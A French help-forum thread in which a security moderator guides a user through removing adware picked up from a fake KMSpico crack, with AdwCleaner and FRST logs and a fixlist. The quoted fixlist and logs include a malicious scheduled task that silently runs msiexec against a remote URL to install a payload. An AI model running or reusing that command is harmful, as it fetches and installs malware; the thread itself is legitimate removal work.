Mon navigateur s'ouvre tout seul et ouvre un nouvel onglet chaque 2 a 3 min en c
Résolu/Fermé
legenie1
Messages postés
11
Date d'inscription
samedi 25 octobre 2014
Statut
Membre
Dernière intervention
14 juin 2017
-
Modifié le 13 juin 2017 à 13:25
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 14 juin 2017 à 18:08
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 14 juin 2017 à 18:08
A voir également:
- Opera gx s'ouvre au demarrage
- Pc lent au démarrage - Guide
- Opera mini pc - Télécharger - Navigateurs
- Reinitialiser pc au demarrage - Guide
- Forcer demarrage pc - Guide
- Écran noir au démarrage - Guide
8 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
13 juin 2017 à 13:25
13 juin 2017 à 13:25
Salut,
Windows a été infecté par des adwares et programmes parasites. Ces indésirables sont connus pour provoquer des affichages de publicités et occasionner de sérieux ralentissements sur tes navigateurs WEB.
Voici les étapes de la procédure à suivre :
1°)
Suis le tutoriel AdwCleaner d'Xplode
Si le copié/collé ne fonctionne pas, utilise le site http://pjjoint.malekal.com/ pour héberger ton rapport, donne le lien du rapport dans un nouveau message.
Note : Le rapport est également sauvegardé sous C:\AdwCleaner[S1].txt
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
(ne pas utiliser zoek et faire une réinitialisation manuelle)
3°) FRST
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Windows a été infecté par des adwares et programmes parasites. Ces indésirables sont connus pour provoquer des affichages de publicités et occasionner de sérieux ralentissements sur tes navigateurs WEB.
Voici les étapes de la procédure à suivre :
1°)
Suis le tutoriel AdwCleaner d'Xplode
- Télécharge le sur ton Bureau ou dans ton dossier des téléchargements,
- Lance "AdwCleaner" puis clique sur [Scanner],
- L'analyse va durer plusieurs minutes, patiente,
- Une fois le scan terminé, ne décoche rien, clique sur [Nettoyer],
- Une fois le nettoyage terminé, un rapport va s'ouvrir,
- Copie/colle le contenu du rapport dans tca prochaine réponse.
Si le copié/collé ne fonctionne pas, utilise le site http://pjjoint.malekal.com/ pour héberger ton rapport, donne le lien du rapport dans un nouveau message.
Note : Le rapport est également sauvegardé sous C:\AdwCleaner[S1].txt
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
(ne pas utiliser zoek et faire une réinitialisation manuelle)
3°) FRST
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
legenie1
Messages postés
11
Date d'inscription
samedi 25 octobre 2014
Statut
Membre
Dernière intervention
14 juin 2017
46
13 juin 2017 à 13:43
13 juin 2017 à 13:43
# AdwCleaner v6.047 - Logfile created 13/06/2017 at 12:31:45
# Updated on 19/05/2017 by Malwarebytes
# Database : 2017-05-19.1 [Local]
# Operating System : Windows 8.1 (X64)
# Username : FRED - FS
# Running from : C:\Users\FRED\Desktop\adwcleaner_6.047.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support/
[-] Service deleted: swdumon
[-] File deleted: C:\Windows\SysNative\drivers\swdumon.sys
[-] Key deleted: HKLM\SOFTWARE\SlimWare Utilities Inc
:: "Tracing" keys deleted
:: Winsock settings cleared
C:\AdwCleaner\AdwCleaner[C0].txt - [6187 Bytes] - [13/06/2017 07:14:34]
C:\AdwCleaner\AdwCleaner[C2].txt - [1263 Bytes] - [13/06/2017 07:31:30]
C:\AdwCleaner\AdwCleaner[C3].txt - [1410 Bytes] - [13/06/2017 08:13:01]
C:\AdwCleaner\AdwCleaner[C4].txt - [1101 Bytes] - [13/06/2017 12:31:45]
C:\AdwCleaner\AdwCleaner[S0].txt - [5694 Bytes] - [13/06/2017 07:11:05]
C:\AdwCleaner\AdwCleaner[S1].txt - [1321 Bytes] - [13/06/2017 07:28:13]
C:\AdwCleaner\AdwCleaner[S2].txt - [1467 Bytes] - [13/06/2017 08:10:44]
C:\AdwCleaner\AdwCleaner[S3].txt - [1602 Bytes] - [13/06/2017 08:26:16]
C:\AdwCleaner\AdwCleaner[S4].txt - [1675 Bytes] - [13/06/2017 12:29:25]
########## EOF - C:\AdwCleaner\AdwCleaner[C4].txt - [1539 Bytes] ##########
# Updated on 19/05/2017 by Malwarebytes
# Database : 2017-05-19.1 [Local]
# Operating System : Windows 8.1 (X64)
# Username : FRED - FS
# Running from : C:\Users\FRED\Desktop\adwcleaner_6.047.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support/
- [ Services ] *****
[-] Service deleted: swdumon
- [ Folders ] *****
- [ Files ] *****
[-] File deleted: C:\Windows\SysNative\drivers\swdumon.sys
- [ DLL ] *****
- [ WMI ] *****
- [ Shortcuts ] *****
- [ Scheduled Tasks ] *****
- [ Registry ] *****
[-] Key deleted: HKLM\SOFTWARE\SlimWare Utilities Inc
- [ Web browsers ] *****
- [ Web browsers ] *****
:: "Tracing" keys deleted
:: Winsock settings cleared
C:\AdwCleaner\AdwCleaner[C0].txt - [6187 Bytes] - [13/06/2017 07:14:34]
C:\AdwCleaner\AdwCleaner[C2].txt - [1263 Bytes] - [13/06/2017 07:31:30]
C:\AdwCleaner\AdwCleaner[C3].txt - [1410 Bytes] - [13/06/2017 08:13:01]
C:\AdwCleaner\AdwCleaner[C4].txt - [1101 Bytes] - [13/06/2017 12:31:45]
C:\AdwCleaner\AdwCleaner[S0].txt - [5694 Bytes] - [13/06/2017 07:11:05]
C:\AdwCleaner\AdwCleaner[S1].txt - [1321 Bytes] - [13/06/2017 07:28:13]
C:\AdwCleaner\AdwCleaner[S2].txt - [1467 Bytes] - [13/06/2017 08:10:44]
C:\AdwCleaner\AdwCleaner[S3].txt - [1602 Bytes] - [13/06/2017 08:26:16]
C:\AdwCleaner\AdwCleaner[S4].txt - [1675 Bytes] - [13/06/2017 12:29:25]
########## EOF - C:\AdwCleaner\AdwCleaner[C4].txt - [1539 Bytes] ##########
legenie1
Messages postés
11
Date d'inscription
samedi 25 octobre 2014
Statut
Membre
Dernière intervention
14 juin 2017
46
13 juin 2017 à 15:21
13 juin 2017 à 15:21
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
13 juin 2017 à 17:36
13 juin 2017 à 17:36
Peut-être désinstaller tous ces programmes, non essentiel :
AVG Driver Updater (totalement inutile)
CyberLink
Intel Security True Key (totalement inutile)
Java
MEGAsync
WildTangent Games
Tu t'es fait avoir un par un faux crack KSMPico.
Mais Windows était déjà infecté d'un autre crack bidon.
A lire :
https://www.malekal.com/kmspico-trojan/
https://forum.malekal.com/viewtopic.php?t=893&start=
~~
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
AVG Driver Updater (totalement inutile)
CyberLink
Intel Security True Key (totalement inutile)
Java
MEGAsync
WildTangent Games
Tu t'es fait avoir un par un faux crack KSMPico.
Mais Windows était déjà infecté d'un autre crack bidon.
A lire :
https://www.malekal.com/kmspico-trojan/
https://forum.malekal.com/viewtopic.php?t=893&start=
~~
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
Task: {96D074F9-BF90-477F-B80F-D4B0336D3BD9} - System32\Tasks\Microsoft\Windows\DeviceSettings\Hogock => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABF050_X4ORCI2ATXXX4ORCI2AT&d=20170520 /q <==== ATTENTION
HKLM-x32\...\Run: [Further Market Inc.] => C:\Program Files (x86)\FurtherMarket\FutherMarket.exe [2148352 2015-01-27] ()
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\...\Run: [RK8V7OYPBGTLAF2] => C:\Program Files\G0W3PP3BGI\G0W3PP3BG.exe [1039872 2017-06-10] (AQ70NCA)
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\...\Run: [WJ2VHRKL0YSU72H] => C:\Program Files (x86)\ov2qg33lsiv\66VXP.exe [1039872 2017-06-10] (AQ70NCA)
ShellExecuteHooks: No Name - {09D8E2B0-392B-11E7-BEAF-64006A5CFC23} - C:\Users\FRED\AppData\Roaming\Morulekazer\Datele.dll [144384 2017-05-20] ()
R2 UnsignedThemes; C:\Windows\unsignedthemes.exe [13824 2013-09-23] (The Within Network, LLC) [File not signed]
2017-06-10 13:29 - 2017-06-10 13:29 - 00001164 _____ C:\Users\FRED\Desktop\Continue KMSpico_patch - Free Download Installation.lnk
2017-06-10 13:23 - 2017-06-10 16:09 - 00000000 ____D C:\Users\FRED\AppData\Roaming\yxouyq2dxv3
2017-06-10 13:22 - 2017-06-10 20:01 - 00000000 ____D C:\Program Files (x86)\NoterSave
2017-06-10 13:22 - 2017-06-10 16:15 - 00000000 ____D C:\Program Files (x86)\ov2qg33lsiv
2017-06-10 13:22 - 2017-06-10 16:09 - 00000000 ____D C:\Users\FRED\AppData\Roaming\u5uojlu0ped
2017-06-10 13:22 - 2017-06-10 13:23 - 00000000 ____D C:\Program Files\G0W3PP3BGI
2017-06-04 23:42 - 2017-06-04 23:42 - 00001074 _____ C:\Users\Public\Desktop\FurtherMarket.lnk
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\Users\FRED\AppData\Local\FurtherMarket
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FurtherMarket
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\Program Files (x86)\FurtherMarket
2017-06-01 10:11 - 2017-06-05 05:29 - 00000000 ____D C:\Users\FRED\AppData\Local\glory
2017-06-01 10:11 - 2017-06-01 22:16 - 00000000 ____D C:\Program Files (x86)\{3007FC13-E6E2-4860-ACDC-83CBE73F773B}
2017-06-01 10:11 - 2017-06-01 10:11 - 00000000 ____D C:\Stuvatybugtain
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Users\FRED\AppData\Local\terana
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Program Files (x86)\MIO
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Program Files (x86)\{1D4524DE-9B0F-4406-A046-AF1D155810FA}
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Pipisy
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Program Files\MK
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Program Files (x86)\{04BA47DF-4A69-4946-B7AF-A9F6E33641F7}
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Cosusp
2017-05-20 09:11 - 2017-05-24 16:47 - 00000000 ____D C:\Program Files (x86)\Biwerghtplawock
2017-05-20 09:11 - 2017-05-20 09:11 - 00006074 _____ C:\Windows\System32\Tasks\Pracly Debuger
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Users\FRED\AppData\Roaming\Morulekazer
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Users\FRED\AppData\Local\Kerlersh
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Program Files (x86)\Pracly Debuger
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
legenie1
Messages postés
11
Date d'inscription
samedi 25 octobre 2014
Statut
Membre
Dernière intervention
14 juin 2017
46
13 juin 2017 à 17:41
13 juin 2017 à 17:41
ok je me lance
--
--
legenie1
Messages postés
11
Date d'inscription
samedi 25 octobre 2014
Statut
Membre
Dernière intervention
14 juin 2017
46
13 juin 2017 à 18:23
13 juin 2017 à 18:23
frst/fix
fixlog:
Fix result of Farbar Recovery Scan Tool (x64) Version: 12-06-2017
Ran by FRED (13-06-2017 17:04:27) Run:1
Running from C:\Users\FRED\Desktop
Loaded Profiles: FRED (Available Profiles: FRED)
Boot Mode: Normal
==============================================
fixlist content:
reateRestorePoint:
CloseProcesses:
Task: {96D074F9-BF90-477F-B80F-D4B0336D3BD9} - System32\Tasks\Microsoft\Windows\DeviceSettings\Hogock => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABF050_X4ORCI2ATXXX4ORCI2AT&d=20170520 /q <==== ATTENTION
HKLM-x32\...\Run: [Further Market Inc.] => C:\Program Files (x86)\FurtherMarket\FutherMarket.exe [2148352 2015-01-27] ()
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\...\Run: [RK8V7OYPBGTLAF2] => C:\Program Files\G0W3PP3BGI\G0W3PP3BG.exe [1039872 2017-06-10] (AQ70NCA)
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\...\Run: [WJ2VHRKL0YSU72H] => C:\Program Files (x86)\ov2qg33lsiv\66VXP.exe [1039872 2017-06-10] (AQ70NCA)
ShellExecuteHooks: No Name - {09D8E2B0-392B-11E7-BEAF-64006A5CFC23} - C:\Users\FRED\AppData\Roaming\Morulekazer\Datele.dll [144384 2017-05-20] ()
R2 UnsignedThemes; C:\Windows\unsignedthemes.exe [13824 2013-09-23] (The Within Network, LLC) [File not signed]
2017-06-10 13:29 - 2017-06-10 13:29 - 00001164 _____ C:\Users\FRED\Desktop\Continue KMSpico_patch - Free Download Installation.lnk
2017-06-10 13:23 - 2017-06-10 16:09 - 00000000 ____D C:\Users\FRED\AppData\Roaming\yxouyq2dxv3
2017-06-10 13:22 - 2017-06-10 20:01 - 00000000 ____D C:\Program Files (x86)\NoterSave
2017-06-10 13:22 - 2017-06-10 16:15 - 00000000 ____D C:\Program Files (x86)\ov2qg33lsiv
2017-06-10 13:22 - 2017-06-10 16:09 - 00000000 ____D C:\Users\FRED\AppData\Roaming\u5uojlu0ped
2017-06-10 13:22 - 2017-06-10 13:23 - 00000000 ____D C:\Program Files\G0W3PP3BGI
2017-06-04 23:42 - 2017-06-04 23:42 - 00001074 _____ C:\Users\Public\Desktop\FurtherMarket.lnk
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\Users\FRED\AppData\Local\FurtherMarket
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FurtherMarket
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\Program Files (x86)\FurtherMarket
2017-06-01 10:11 - 2017-06-05 05:29 - 00000000 ____D C:\Users\FRED\AppData\Local\glory
2017-06-01 10:11 - 2017-06-01 22:16 - 00000000 ____D C:\Program Files (x86)\{3007FC13-E6E2-4860-ACDC-83CBE73F773B}
2017-06-01 10:11 - 2017-06-01 10:11 - 00000000 ____D C:\Stuvatybugtain
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Users\FRED\AppData\Local\terana
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Program Files (x86)\MIO
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Program Files (x86)\{1D4524DE-9B0F-4406-A046-AF1D155810FA}
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Pipisy
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Program Files\MK
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Program Files (x86)\{04BA47DF-4A69-4946-B7AF-A9F6E33641F7}
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Cosusp
2017-05-20 09:11 - 2017-05-24 16:47 - 00000000 ____D C:\Program Files (x86)\Biwerghtplawock
2017-05-20 09:11 - 2017-05-20 09:11 - 00006074 _____ C:\Windows\System32\Tasks\Pracly Debuger
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Users\FRED\AppData\Roaming\Morulekazer
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Users\FRED\AppData\Local\Kerlersh
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Program Files (x86)\Pracly Debuger
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
reateRestorePoint: => Error: No automatic fix found for this entry.
Processes closed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{96D074F9-BF90-477F-B80F-D4B0336D3BD9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{96D074F9-BF90-477F-B80F-D4B0336D3BD9} => key removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\DeviceSettings\Hogock => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\DeviceSettings\Hogock => key removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Further Market Inc. => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\Software\Microsoft\Windows\CurrentVersion\Run\\RK8V7OYPBGTLAF2 => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\Software\Microsoft\Windows\CurrentVersion\Run\\WJ2VHRKL0YSU72H => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{09D8E2B0-392B-11E7-BEAF-64006A5CFC23} => value removed successfully
HKLM\Software\Classes\CLSID\{09D8E2B0-392B-11E7-BEAF-64006A5CFC23} => key removed successfully
HKLM\System\CurrentControlSet\Services\UnsignedThemes => key removed successfully
UnsignedThemes => service removed successfully
C:\Users\FRED\Desktop\Continue KMSpico_patch - Free Download Installation.lnk => moved successfully
C:\Users\FRED\AppData\Roaming\yxouyq2dxv3 => moved successfully
C:\Program Files (x86)\NoterSave => moved successfully
C:\Program Files (x86)\ov2qg33lsiv => moved successfully
C:\Users\FRED\AppData\Roaming\u5uojlu0ped => moved successfully
C:\Program Files\G0W3PP3BGI => moved successfully
C:\Users\Public\Desktop\FurtherMarket.lnk => moved successfully
C:\Users\FRED\AppData\Local\FurtherMarket => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FurtherMarket => moved successfully
C:\Program Files (x86)\FurtherMarket => moved successfully
C:\Users\FRED\AppData\Local\glory => moved successfully
C:\Program Files (x86)\{3007FC13-E6E2-4860-ACDC-83CBE73F773B} => moved successfully
C:\Stuvatybugtain => moved successfully
C:\Users\FRED\AppData\Local\terana => moved successfully
C:\Program Files (x86)\MIO => moved successfully
C:\Program Files (x86)\{1D4524DE-9B0F-4406-A046-AF1D155810FA} => moved successfully
C:\Pipisy => moved successfully
C:\Program Files\MK => moved successfully
C:\Program Files (x86)\{04BA47DF-4A69-4946-B7AF-A9F6E33641F7} => moved successfully
C:\Cosusp => moved successfully
C:\Program Files (x86)\Biwerghtplawock => moved successfully
C:\Windows\System32\Tasks\Pracly Debuger => moved successfully
C:\Users\FRED\AppData\Roaming\Morulekazer => moved successfully
C:\Users\FRED\AppData\Local\Kerlersh => moved successfully
C:\Program Files (x86)\Pracly Debuger => moved successfully
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
========= RemoveProxy: =========
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
========= End of RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 8595825 B
Java, Flash, Steam htmlcache => 708 B
Windows/system/drivers => 121910297 B
Edge => 0 B
Chrome => 147456 B
Firefox => 2113062 B
Opera => 214016 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile32 => 0 B
LocalService => 26336 B
NetworkService => 0 B
FRED => 17648222 B
RecycleBin => 0 B
EmptyTemp: => 151.7 MB temporary data Removed.
================================
The system needed a reboot.
fixlog:
Fix result of Farbar Recovery Scan Tool (x64) Version: 12-06-2017
Ran by FRED (13-06-2017 17:04:27) Run:1
Running from C:\Users\FRED\Desktop
Loaded Profiles: FRED (Available Profiles: FRED)
Boot Mode: Normal
==============================================
fixlist content:
reateRestorePoint:
CloseProcesses:
Task: {96D074F9-BF90-477F-B80F-D4B0336D3BD9} - System32\Tasks\Microsoft\Windows\DeviceSettings\Hogock => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABF050_X4ORCI2ATXXX4ORCI2AT&d=20170520 /q <==== ATTENTION
HKLM-x32\...\Run: [Further Market Inc.] => C:\Program Files (x86)\FurtherMarket\FutherMarket.exe [2148352 2015-01-27] ()
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\...\Run: [RK8V7OYPBGTLAF2] => C:\Program Files\G0W3PP3BGI\G0W3PP3BG.exe [1039872 2017-06-10] (AQ70NCA)
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\...\Run: [WJ2VHRKL0YSU72H] => C:\Program Files (x86)\ov2qg33lsiv\66VXP.exe [1039872 2017-06-10] (AQ70NCA)
ShellExecuteHooks: No Name - {09D8E2B0-392B-11E7-BEAF-64006A5CFC23} - C:\Users\FRED\AppData\Roaming\Morulekazer\Datele.dll [144384 2017-05-20] ()
R2 UnsignedThemes; C:\Windows\unsignedthemes.exe [13824 2013-09-23] (The Within Network, LLC) [File not signed]
2017-06-10 13:29 - 2017-06-10 13:29 - 00001164 _____ C:\Users\FRED\Desktop\Continue KMSpico_patch - Free Download Installation.lnk
2017-06-10 13:23 - 2017-06-10 16:09 - 00000000 ____D C:\Users\FRED\AppData\Roaming\yxouyq2dxv3
2017-06-10 13:22 - 2017-06-10 20:01 - 00000000 ____D C:\Program Files (x86)\NoterSave
2017-06-10 13:22 - 2017-06-10 16:15 - 00000000 ____D C:\Program Files (x86)\ov2qg33lsiv
2017-06-10 13:22 - 2017-06-10 16:09 - 00000000 ____D C:\Users\FRED\AppData\Roaming\u5uojlu0ped
2017-06-10 13:22 - 2017-06-10 13:23 - 00000000 ____D C:\Program Files\G0W3PP3BGI
2017-06-04 23:42 - 2017-06-04 23:42 - 00001074 _____ C:\Users\Public\Desktop\FurtherMarket.lnk
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\Users\FRED\AppData\Local\FurtherMarket
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FurtherMarket
2017-06-04 23:42 - 2017-06-04 23:42 - 00000000 ____D C:\Program Files (x86)\FurtherMarket
2017-06-01 10:11 - 2017-06-05 05:29 - 00000000 ____D C:\Users\FRED\AppData\Local\glory
2017-06-01 10:11 - 2017-06-01 22:16 - 00000000 ____D C:\Program Files (x86)\{3007FC13-E6E2-4860-ACDC-83CBE73F773B}
2017-06-01 10:11 - 2017-06-01 10:11 - 00000000 ____D C:\Stuvatybugtain
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Users\FRED\AppData\Local\terana
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Program Files (x86)\MIO
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Program Files (x86)\{1D4524DE-9B0F-4406-A046-AF1D155810FA}
2017-05-27 13:11 - 2017-05-27 13:11 - 00000000 ____D C:\Pipisy
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Program Files\MK
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Program Files (x86)\{04BA47DF-4A69-4946-B7AF-A9F6E33641F7}
2017-05-25 10:12 - 2017-05-25 10:12 - 00000000 ____D C:\Cosusp
2017-05-20 09:11 - 2017-05-24 16:47 - 00000000 ____D C:\Program Files (x86)\Biwerghtplawock
2017-05-20 09:11 - 2017-05-20 09:11 - 00006074 _____ C:\Windows\System32\Tasks\Pracly Debuger
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Users\FRED\AppData\Roaming\Morulekazer
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Users\FRED\AppData\Local\Kerlersh
2017-05-20 09:11 - 2017-05-20 09:11 - 00000000 ____D C:\Program Files (x86)\Pracly Debuger
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
reateRestorePoint: => Error: No automatic fix found for this entry.
Processes closed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{96D074F9-BF90-477F-B80F-D4B0336D3BD9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{96D074F9-BF90-477F-B80F-D4B0336D3BD9} => key removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\DeviceSettings\Hogock => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\DeviceSettings\Hogock => key removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Further Market Inc. => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\Software\Microsoft\Windows\CurrentVersion\Run\\RK8V7OYPBGTLAF2 => value removed successfully
HKU\S-1-5-21-4285240962-635258873-1796965326-1001\Software\Microsoft\Windows\CurrentVersion\Run\\WJ2VHRKL0YSU72H => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{09D8E2B0-392B-11E7-BEAF-64006A5CFC23} => value removed successfully
HKLM\Software\Classes\CLSID\{09D8E2B0-392B-11E7-BEAF-64006A5CFC23} => key removed successfully
HKLM\System\CurrentControlSet\Services\UnsignedThemes => key removed successfully
UnsignedThemes => service removed successfully
C:\Users\FRED\Desktop\Continue KMSpico_patch - Free Download Installation.lnk => moved successfully
C:\Users\FRED\AppData\Roaming\yxouyq2dxv3 => moved successfully
C:\Program Files (x86)\NoterSave => moved successfully
C:\Program Files (x86)\ov2qg33lsiv => moved successfully
C:\Users\FRED\AppData\Roaming\u5uojlu0ped => moved successfully
C:\Program Files\G0W3PP3BGI => moved successfully
